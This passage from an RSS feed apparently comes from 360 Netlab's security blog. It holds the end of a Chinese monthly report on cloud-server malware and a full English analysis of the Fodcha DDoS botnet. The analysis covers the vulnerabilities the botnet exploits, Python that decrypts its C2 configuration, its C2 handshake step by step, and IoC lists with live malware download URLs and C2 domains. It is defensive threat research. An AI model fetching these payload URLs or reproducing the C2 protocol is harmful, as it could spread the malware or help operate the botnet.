loading="lazy"></figure><p>&#x5168;&#x7403;&#x4E91;&#x670D;&#x52A1;&#x5668;&#x7684;&#x4E09;&#x6708;&#x6570;&#x636E;&#x4E2D;&#xFF0C;&#x6355;&#x83B7;&#x8D85;2000&#x4E2A;&#xFF0C;&#x65E5;&#x5747;&#x4F20;&#x64AD;&#x6B21;&#x6570;&#x8D85;16&#x4E07;&#x4F59;&#x6B21;&#xFF0C;&#x6D89;&#x53CA;&#x6076;&#x610F;&#x7A0B;&#x5E8F;&#x5BB6;&#x65CF;38&#x4E2A;&#xFF0C;&#x5176;&#x4E2D;&#x6309;&#x6837;&#x672C;&#x6355;&#x83B7;&#x91CF;&#x4EE5;Mirai&#x5BB6;&#x65CF;&#x53CA;&#x5176;&#x53D8;&#x79CD;&#x4E3A;&#x9996;&#xFF0C;&#x6309;&#x4F20;&#x64AD;&#x6B21;&#x6570;&#x6392;&#x540D;&#x524D;&#x4E09;&#x4F4D;&#x7684;&#x4E3A;CoinMiner&#x3001;Mirai&#x3001;Rootkit&#x5BB6;&#x65CF;&#x3002;</p><figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com/content/images/2022/04/image-50.png" class="kg-image" alt loading="lazy"></figure><p>&#x5176;&#x4E2D;&#x56FD;&#x5185;&#x4E91;&#x670D;&#x52A1;&#x5668;&#xFF0C;&#x6355;&#x83B7;&#x6076;&#x610F;&#x7A0B;&#x5E8F;&#x6837;&#x672C;&#x6570;&#x91CF;&#x8D85;400&#x4F59;&#x4E2A;&#xFF0C;&#x65E5;&#x5747;&#x4F20;&#x64AD;&#x6B21;&#x6570;10&#x4E07;&#x4F59;&#x6B21;&#xFF0C;&#x6D89;&#x53CA;&#x6076;&#x610F;&#x7A0B;&#x5E8F;&#x5BB6;&#x65CF;&#x8FD1;30&#x4E2A;&#xFF0C;&#x5176;&#x4E2D;&#x6309;&#x6837;&#x672C;&#x6355;&#x83B7;&#x91CF;&#x4EE5;CoinMiner&#x5BB6;&#x65CF;&#x53CA;&#x5176;&#x53D8;&#x79CD;&#x4E3A;&#x9996;&#xFF0C;&#x6309;&#x4F20;&#x64AD;&#x6B21;&#x6570;&#x6392;&#x540D;&#x524D;&#x4E09;&#x4F4D;&#x7684;&#x4E3A;CoinMiner&#x3001;Rootkit&#x3001;TrojanDownloader&#x5BB6;&#x65CF;&#x3002;</p><figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com/content/images/2022/04/image-53.png" class="kg-image" alt loading="lazy"></figure><p>&#x4ECE;&#x4E91;&#x670D;&#x52A1;&#x5546;&#x7684;&#x60C5;&#x51B5;&#x6765;&#x770B;&#xFF0C;&#x672C;&#x6708;&#x6570;&#x91CF;&#x524D;5&#x7684;&#x4E91;&#x670D;&#x52A1;&#x5546;&#x662F;&#x817E;&#x8BAF;&#x4E91;&#x3001;DigitalOcean&#x3001;&#x963F;&#x91CC;&#x4E91;&#x3001;&#x4E9A;&#x9A6C;&#x900A;AWS&#x548C;&#x5FAE;&#x8F6F;Azure&#x3002;</p><figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com/content/images/2022/04/image-33.png" class="kg-image" alt loading="lazy"></figure><p><strong>&#x4ECE;&#x6F0F;&#x6D1E;&#x653B;&#x51FB;&#x9488;&#x5BF9;&#x7684;&#x5382;&#x5546;&#x3001;&#x4EA7;&#x54C1;&#x5206;&#x6790;</strong>&#xFF0C;&#x5404;&#x7C7B;&#x6F0F;&#x6D1E;&#x653B;&#x51FB;&#x7684;IP&#x6570;&#x91CF;&#x8F83;&#x4E8C;&#x6708;&#x6709;&#x5927;&#x5E45;&#x5EA6;&#x63D0;&#x5347;&#xFF0C;&#x5C24;&#x5176;&#x4E13;&#x6CE8;&#x4E8E;&#x5BF9;Redis&#x3001;Docker&#x7B49;&#x8BBE;&#x5907;&#x7684;&#x91CD;&#x70B9;&#x653B;&#x51FB;&#x3002;</p><figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com/content/images/2022/04/image-12.png" class="kg-image" alt loading="lazy"></figure><p><strong>&#x4ECE;&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x4F20;&#x64AD;&#x60C5;&#x51B5;&#x5206;&#x6790;</strong>&#xFF0C;&#x6076;&#x610F;&#x6316;&#x77FF;&#x7C7B;&#xFF08;CoinMiner&#xFF09;&#x4F20;&#x64AD;&#x6B21;&#x6570;&#x6700;&#x591A;&#xFF0C;&#x6728;&#x9A6C;&#x4E0B;&#x8F7D;&#x5668;&#xFF08;TrojanDownloader&#xFF09;&#x7684;&#x4F20;&#x64AD;&#x6E90;IP&#x6570;&#x91CF;&#x6700;&#x591A;&#xFF0C;&#x8D85;&#x8FC7;5500&#x4E2A;&#x3002;</p><figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com/content/images/2022/04/image-14.png" class="kg-image" alt loading="lazy"></figure><p>oracle.zzhreceive.top&#x548C;bbq.zzhreceive.top&#x662F;&#x88AB;&#x6700;&#x591A;IP&#x4F7F;&#x7528;&#x7684;&#x4E0B;&#x8F7D;&#x670D;&#x52A1;&#x5668;&#x3002;</p><figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com/content/images/2022/04/image-38.png" class="kg-image" alt loading="lazy"></figure><p>&#x5728;&#x5BC6;&#x7801;&#x7206;&#x7834;&#x653B;&#x51FB;&#x65B9;&#x9762;&#xFF0C;81.3%&#x7684;&#x4E91;&#x670D;&#x52A1;&#x5668;IP&#x96C6;&#x4E2D;&#x5728;SSH&#x534F;&#x8BAE;&#x7684;&#x66B4;&#x529B;&#x7834;&#x89E3;&#x4E0A;&#xFF0C;&#x5176;&#x6B21;&#x662F;Telnet&#x534F;&#x8BAE;&#xFF0C;&#x5360;&#x6BD4;8.8%&#x3002;&#x817E;&#x8BAF;&#x4E91;&#x548C;DigitalCloud&#x662F;&#x66B4;&#x529B;&#x7834;&#x89E3;&#x653B;&#x51FB;&#x6E90;IP&#x6700;&#x591A;&#x7684;&#x4E91;&#x670D;&#x52A1;&#x5546;&#xFF0C;3&#x6708;&#x4EFD;&#x5206;&#x522B;&#x6709;4700+&#x548C;4300+&#x4E2A;&#x653B;&#x51FB;&#x6E90;IP&#x3002;&#x5728;&#x66B4;&#x529B;&#x7834;&#x89E3;&#x4F1A;&#x8BDD;&#x6570;&#x65B9;&#x9762;&#xFF0C;DigitalCloud&#x9065;&#x9065;&#x9886;&#x5148;&#xFF0C;&#x6709;&#x591A;&#x8FBE;3052&#x4E07;&#x6B21;&#x66B4;&#x529B;&#x7834;&#x89E3;&#x4F1A;&#x8BDD;&#x3002;</p><figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com/content/images/2022/04/image-34.png" class="kg-image" alt loading="lazy"></figure><hr><!--kg-card-begin: markdown--><h3 id>&#x8054;&#x7CFB;&#x6211;&#x4EEC;</h3>
<p>&#x611F;&#x5174;&#x8DA3;&#x7684;&#x8BFB;&#x8005;&#xFF0C;&#x53EF;&#x4EE5;&#x5728; <a href="https://twitter.com/360Netlab?ref=blog.netlab.360.com"><strong>twitter</strong></a> &#x6216;&#x8005;&#x901A;&#x8FC7;&#x90AE;&#x4EF6;<strong>netlab[at]360.cn</strong>&#x8054;&#x7CFB;&#x6211;&#x4EEC;&#x3002;</p>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><h3 id="ioclist">IoC List</h3>
<p>URL&#xFF1A;</p>
<pre><code>http://14.1.98.226:8880/7z
http://51.81.133.90/NWWW.6
http://51.81.133.90/qweasd
http://14.1.98.226:8880/ff.elf
</code></pre>
<p>md5&#xFF1A;</p>
<pre><code>b9bcb150c1449dcc6a69ff1916a115ce
8c47779d3ad0e925461b4fbf7d3a139d
392f13b090f54438b3212005226e5d52
24afae2eee766cbabf8142ef076ce1
</code></pre>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[Fodcha, a new DDos botnet]]></title><description><![CDATA[<h2 id="overview">Overview</h2><p>Recently, CNCERT and 360netlab worked together and discovered a rapidly spreading DDoS botnet on the Internet. The global infection looks fairly big as just in China there are more than 10,000 daily active bots (IPs) and alsomore than 100 DDoS victims beingtargeted on a daily basis. We named</p>]]></description><link>https://blog.netlab.360.com/fodcha-a-new-ddos-botnet/</link><guid isPermaLink="false">63873b9a8b1c1e0007f53017</guid><category><![CDATA[Botnet]]></category><category><![CDATA[Import 2022-11-30 11:16]]></category><category><![CDATA[en]]></category><dc:creator><![CDATA[Hui Wang]]></dc:creator><pubDate>Wed, 13 Apr 2022 14:01:14 GMT</pubDate><content:encoded><![CDATA[<h2 id="overview">Overview</h2><p>Recently, CNCERT and 360netlab worked together and discovered a rapidly spreading DDoS botnet on the Internet. The global infection looks fairly big as just in China there are more than 10,000 daily active bots (IPs) and alsomore than 100 DDoS victims beingtargeted on a daily basis. We named the botnet Fodcha because of its initial use of the C2 domain name folded.in and its use of the chacha algorithm to encrypt network traffic.</p><h2 id="botnet-size">Botnet size</h2>
<p>From March 29 to April 10, 2022, the total number of unique Fodcha bots(IPs) has exceeded 62,000, and daily numbers fluctuate around 10,000. A daily breakdown is shown below.</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/04/fodcha.online.png" alt="fodcha.online" loading="lazy"></p>
<blockquote>
<p>Netlab note:<br>
Based on direct data from the security community that we worked with, the number of daily live bots are more than 56000.</p>
</blockquote>
<p>When we look at the domestic data, the top provinces that the bots are coming from are the Shandong Province (12.9%), the Liaoning Province (11.8%) and the Zhejiang Province (9.9%).The service providers that these bots originate from are China Unicom(59.9%), China Telecom(39.4%), and China Mobile(0.5%).</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/04/fodcha.diss.province-1.png" alt="fodcha.diss.province-1" loading="lazy"><br>
<img src="https://blog.netlab.360.com/content/images/2022/04/fodcha.diss.isp.png" alt="fodcha.diss.isp" loading="lazy"></p>
<h2 id="spread-method">Spread method</h2>
<p>Fodcha is mainly spreading through the following NDay vulnerabilities and Telnet/SSH weak passwords.</p>
<blockquote>
<p>Netlab note:<br>
We observed that a brute-force cracking tool we named Crazyfia appears on the same downloader server of FodchaThe scan results of this tool will be used by the Fodcha author to install Fodcha samples on the vulnerable devices.</p>
</blockquote>
<p><img src="https://blog.netlab.360.com/content/images/2022/04/fodcha.vul.png" alt="fodcha.vul" loading="lazy"></p>
<p>List of main vulnerabilities:</p>
<table>
<thead>
<tr>
<th>Vulnerability</th>
<th>Affected Device/Service</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://www.exploit-db.com/exploits/39328?ref=blog.netlab.360.com">Android ADB Debug Server RCE</a></td>
<td>Android</td>
</tr>
<tr>
<td><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22205&amp;ref=blog.netlab.360.com">CVE-2021-22205</a></td>
<td>GitLab</td>
</tr>
<tr>
<td><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-35394?ref=blog.netlab.360.com">CVE-2021-35394</a></td>
<td>Realtek Jungle SDK</td>
</tr>
<tr>
<td><a href="https://www.exploit-db.com/exploits/41471/?ref=blog.netlab.360.com">JAWS Webserver unauthenticated shell command execution</a></td>
<td>MVPower DVR</td>
</tr>
<tr>
<td><a href="https://blog.netlab.360.com/multiple-botnets-are-spreading-using-lilin-dvr-0-day/">LILIN DVR RCE</a></td>
<td>LILIN DVR</td>
</tr>
<tr>
<td><a href="https://www.exploit-db.com/exploits/37770?ref=blog.netlab.360.com">TOTOLINK Routers Backdoor</a></td>
<td>TOTOLINK Routers</td>
</tr>
<tr>
<td><a href="https://www.exploit-db.com/exploits/38453?ref=blog.netlab.360.com">ZHONE Router Web RCE</a></td>
<td>ZHONE Router</td>
</tr>
</tbody>
</table>
<h2 id="sample-analysis">Sample Analysis</h2>
<p>The Fodcha botnet includes samples targeting mips, mpsl, arm, x86, and other CPU architectures. In the past 3 months, the Fodcha samples we captured can be divided into two versions, v1 and v2. Their main functions are almost the same. By cross-referencing the different versions, we can tell that the Fodcha operators are really trying to hide their C2s and load-balance among the C2s.</p>
<table>
<thead>
<tr>
<th>Version</th>
<th>Chacha20</th>
<th>C2 Format</th>
<th>C2</th>
<th>MAPPING(Domain&lt;--&gt;IP)</th>
<th>MAPPING(IP&lt;--&gt;PORT )</th>
</tr>
</thead>
<tbody>
<tr>
<td>v1</td>
<td>yes</td>
<td>plaintext</td>
<td>folded.in</td>
<td>1:N</td>
<td>N:1</td>
</tr>
<tr>
<td>v2</td>
<td>yes</td>
<td>ciphertext</td>
<td>fridgexperts.cc</td>
<td>1:N</td>
<td>N:10</td>
</tr>
</tbody>
</table>
<p>The latest sample of V2 X86 CPU architecture is selected as the main object of analysis in this paper, and its basic information is as follows.</p>
<pre><code>8ea56a9fa9b11b15443b369f49fa9719
ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
Packer:None
</code></pre>
<p>Fodcha&apos;s function is simple. When it executes on the compromised device, it first checks the runtime parameters. When there are no parameters, it exits out. Fodcha does this as a simple countermeasure to deter sandbox. When parameters are present, it first decrypts the key configurations data, the data include some sensitive information such as C2s will It then prints &#x201C;here we are&#x201D; on the Console, and uses a random string to disguise the process name. Finally communication with the C2 will be established. The following section will focus on Fodcha&apos;s decryption method and network communication.</p>
<h4 id="decrypting-key-configurations">Decrypting key configurations</h4>
<p>Fodcha uses a multiple-Xor encryption method to protect its key configurations such as C2 data.</p>
<img src="https://blog.netlab.360.com/content/images/2022/04/fodcha_xor.png" width="860px">
<p>The corresponding python implementation is shown below, taking the ciphertext <code>EB D3 EB C9 C2 EF F6 FD FD FC FB F1 A3 FB E9</code> in the sample as an example. After decryption, we will get the Fodcha&apos;s C2: <strong>fridgexperts.cc</strong>.</p>
<pre><code class="language-python">cipher=[  0xEB, 0xD3, 0xEB, 0xC9, 0xC2, 0xEF, 0xF6, 0xFD, 0xFD, 0xFC, 
  0xFB, 0xF1, 0xA3, 0xFB, 0xE9]
  
key=[0x66, 0x4A, 0x69, 0x46, 0x4E, 0x61, 0x65, 0x66, 0x73, 0x65, 
  0x64, 0x69, 0x66, 0x73, 0x61, 0x69, 0x66, 0x73, 0x69,00]

tmp=[]

for i in range(len(cipher)):
    tmp.append((cipher[i] ^ key[i])%0xff^0xbe)

for i in range(len(tmp)):
    for j in key:
        tmp[i]^=j
out=&apos;&apos;.join([chr(i) for i in tmp])

print out
</code></pre>
<h4 id="network-communication">Network communication</h4>
<p>Fodcha establishes a connection with C2 through the following code fragment where the DNS A record IP of the C2 domain corresponds to the PORT of N:10.</p>
<img src="https://blog.netlab.360.com/content/images/2022/04/fodcha_connect.png" width="860px">
<img src="https://blog.netlab.360.com/content/images/2022/04/fodcha_mapping.png" width="860px"> 
<p>Once the connection is successfully established with C2, the Bot must go through 5 rounds of interaction with C2 before it can actually communicate with C2. We use arm as the packet string, which generates the network traffic shown in the following figure.</p>
<img src="https://blog.netlab.360.com/content/images/2022/04/fodcha_net.png" width="860px"> 
<p>Let us elaborate on how this traffic is generated:</p>
<h6 id="step-1-botc2-fixed-length-5-bytes">Step 1: Bot--&gt;C2 (fixed length 5 bytes)</h6>
<p>The hard-coded <code>ee 00 00</code> is calculated by the tcp/ip checksum method to get the 2-byte checksum value 0xff11, which is filled to the last 2 bytes.</p>
<pre><code class="language-python">def checksum(data):
  s = 0
  n = len(data) % 2
  for i in range(0, len(data)-n, 2):
    s+= ord(data[i]) + (ord(data[i+1]) &lt;&lt; 8)
  if n:
    s+= ord(data[i+1])
  while (s &gt;&gt; 16):
    s = (s &amp; 0xFFFF) + (s &gt;&gt; 16)
  s = ~s &amp; 0xffff
  return s
</code></pre>
<h6 id="step-2-c2bot-2-times-the-first-32-bytes-the-second-12-bytes">Step 2: C2--&gt;BOT (2 times, the first 32 bytes; the second 12 bytes)</h6>
<p>Note that the key and nonce are generated by the C2 side, not fixed.</p>
<pre><code>32 bytes at the beginning is chacha20 key:

26 14 2d 4d 58 d2 9e 26  67 98 bc e4 ef 69 b9 04
e6 d0 73 17 5c 4f 71 33  9f 97 18 f7 31 8d d4 d6

12 bytes at the last is chacha20 nonce:

2f 8a 5c da 57 50 a6 64  d7 98 f5 5d
</code></pre>
<h6 id="step-3-botc2-fixed-length-5-bytes">Step 3: BOT--&gt;C2 (fixed length 5 bytes)</h6>
<p>Hard-coded <code>55 00 00</code> by checksum, calculate the checksum value 0xffaa, fill in the last 2 bytes, become <code>55 00 00 aa ff</code>, then use chacha20 algorithm to encrypt, the number of rounds is 1, get <code>99 9e 95 f6 32</code>.</p>
<h6 id="step-4-c2botfixed-length-5-bytes">Step 4: C2--&gt;BOT(fixed length 5 bytes)</h6>
<p>At this point, if the format of the 5 bytes received is <code>0x55</code> at the beginning and the last 2 bytes are the checksum value, it means the previous interaction is right, enter Step 5 and ask BOT to start sending packet information.</p>
<h6 id="step-5-botc2-2-times-the-first-5-bytes-the-second-grouping">Step 5: Bot---&gt;C2 (2 times, the first 5 bytes, the second grouping)</h6>
<ul>
<li>
<p>First time<br>
Hard-coded <code>fe 00 00</code>, the third byte is really the grouping length, becomes <code>fe 00 03</code>, calculate the checksum value 0xfefe, fill in the tail to get <code>fe 00 03 fe fe</code></p>
</li>
<li>
<p>Second time<br>
grouping string <code>arm</code>, use chacha20 encryption, round number 1, get <code>ad ec f8</code></p>
</li>
</ul>
<p>At this point the BOT is successfully registered and waits to execute the instruction issued by C2. The instruction code and its meaning are shown below:<br>
- 0x69, Heartbeat<br>
<img src="https://blog.netlab.360.com/content/images/2022/04/fodcha_heart.png" width="860px"><br>
- 0xEB, DDoS Attack<br>
- 0xFB, Exit</p>
<h2 id="c2-tracking">C2 Tracking</h2>
<p>Our botnet tracking system data shows that Fodcha has been launching DDoS attacks non stop since it came online, with the following trends in attack targets.</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/04/fodcha.cccommand.png" alt="fodcha.cccommand" loading="lazy"></p>
<p>As you can see, the DDoS behavior of this family is very active:</p>
<ul>
<li>The most active attack time was on 2022-03-01, with over 130k attacking commands being recorded.</li>
<li>In the recent week, the average daily attack command has exceeded 7k, targeting 100+ DDoS victims.</li>
</ul>
<p>At the same time, we can also clearly see from the DNS perspective that the C2 domain of this family made a turnover around 2022-03-19, corresponding to the shift from v1 to v2 in the aforementioned sample analysis section.</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/04/c2.dns.png" alt="c2.dns" loading="lazy"></p>
<blockquote>
<p>Netlab note:<br>
The shift from v1 to v2 is due to the fact that the C2 servers  corresponding to the v1 version were shutdown by a their cloud vendor, so Fodcha&apos;s operators had no choice but to re-launch v2 and update C2. The new C2 is mapped to more than a dozen IPs and is distributed across multiple countries including the US, Korea, Japan, and India, it involves more cloud providers such as Amazon, DediPath, DigitalOcean, Linode, and many others.</p>
</blockquote>
<h2 id="ioc">IoC</h2>
<h4 id="sample-hashmd5">Sample Hash(md5)</h4>
<pre><code>0e3ff1a19fcd087138ec85d5dba59715
1b637faa5e424966393928cd6df31849
208e72261e10672caa60070c770644ba
2251cf2ed00229c8804fc91868b3c1cb
2a02e6502db381fa4d4aeb356633af73
2ed0c36ebbeddb65015d01e6244a2846
2fe2deeb66e1a08ea18dab520988d9e4
37adb95cbe4875a9f072ff7f2ee4d4ae
3fc8ae41752c7715f7550dabda0eb3ba
40f53c47d360c1c773338ef5c42332f8
4635112e2dfe5068a4fe1ebb1c5c8771
525670acfd097fa0762262d9298c3b3b
54e4334baa01289fa4ee966a806ef7f1
5567bebd550f26f0a6df17b95507ca6d
5bdb128072c02f52153eaeea6899a5b1
6244e9da30a69997cf2e61d8391976d9
65dd4b23518cba77caab3e8170af8001
6788598e9c37d79fd02b7c570141ddcf
760b2c21c40e33599b0a10cf0958cfd4
792fdd3b9f0360b2bbee5864845c324c
7a6ebf1567de7e432f09f53ad14d7bc5
9413d6d7b875f071314e8acae2f7e390
954879959743a7c63784d1204efc7ed3
977b4f1a153e7943c4db6e5a3bf40345
9defda7768d2d806b06775c5768428c4
9dfa80650f974dffe2bda3ff8495b394
a996e86b511037713a1be09ee7af7490
b11d8e45f7888ce85a67f98ed7f2cd89
b1776a09d5490702c12d85ab6c6186cd
b774ad07f0384c61f96a7897e87f96c0
c99db0e8c3ecab4dd7f13f3946374720
c9cbf28561272c705c5a6b44897757ca
cbdb65e4765fbd7bcae93b393698724c
d9c240dbed6dfc584a20246e8a79bdae
e372e5ca89dbb7b5c1f9f58fe68a8fc7
ebf81131188e3454fe066380fa469d22
fe58b08ea78f3e6b1f59e5fe40447b11
</code></pre>
<h4 id="download-links">Download Links</h4>
<pre><code>http://139.177.195.192/bins/arm
http://139.177.195.192/bins/arm5
http://139.177.195.192/bins/arm7
http://139.177.195.192/bins/mips
http://139.177.195.192/bins/realtek.mips
http://139.177.195.192/blah
http://139.177.195.192/linnn
http://139.177.195.192/skidrt
http://139.177.195.192/z.sh
http://162.33.179.171/bins/arm
http://162.33.179.171/bins/arm7
http://162.33.179.171/bins/mpsl
http://162.33.179.171/bins/realtek.mips
http://162.33.179.171/bins/realtek.mpsl
http://162.33.179.171/blah
http://162.33.179.171/k.sh
http://162.33.179.171/linnn
http://162.33.179.171/z.sh
http://206.188.197.104/bins/arm7
http://206.188.197.104/bins/realtek.mips
http://206.188.197.104/skidrt
http://31.214.245.253/bins/arm
http://31.214.245.253/bins/arm7
http://31.214.245.253/bins/mips
http://31.214.245.253/bins/mpsl
http://31.214.245.253/bins/x86
http://31.214.245.253/k.sh
http://31.214.245.253/kk.sh
</code></pre>
<h4 id="c2-domain">C2 domain</h4>
<pre><code>folded.in
fridgexperts.cc
</code></pre>
<h2 id="contact-us">Contact us</h2>
<p>Readers are always welcomed to reach us on Twitter or email us to netlab at 360 dot cn.</p>
]]></content:encoded></item></channel></rss>